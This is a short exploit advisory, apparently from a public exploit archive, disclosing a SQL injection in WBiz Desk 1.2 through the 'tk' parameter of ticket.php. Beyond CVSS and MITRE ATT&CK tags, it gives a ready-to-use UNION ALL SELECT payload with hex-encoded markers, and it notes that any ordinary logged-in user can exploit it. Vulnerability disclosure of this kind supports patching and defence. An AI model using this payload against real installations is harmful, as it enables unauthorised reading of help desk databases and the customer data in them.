Headline
WBiz Desk 1.2 SQL Injection
WBiz Desk version 1.2 suffers from a remote SQL injection vulnerability.
[#] Exploit Title: WBiz Desk 1.2 - SQL Injection[#] Exploit Date: May 12, 2023.[#] CVSS 3.1: 6.4 (Medium)[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N[#] Tactic: Initial Access (TA0001)[#] Technique: Exploit Public-Facing Application (T1190)[#] Application Name: WBiz Desk[#] Application Version: 1.2[#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system[#] Author: h4ck3r - Faisal Albuloushi[#] Contact: [email protected][#] Blog: https://www.0wl.tech[#] 3xploit:[path]//ticket.php?tk=[SQL Injection][#] 3xample:[path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- -[#] Notes:- The vulnerability requires a non-admin privilege (normal) user to be exploited.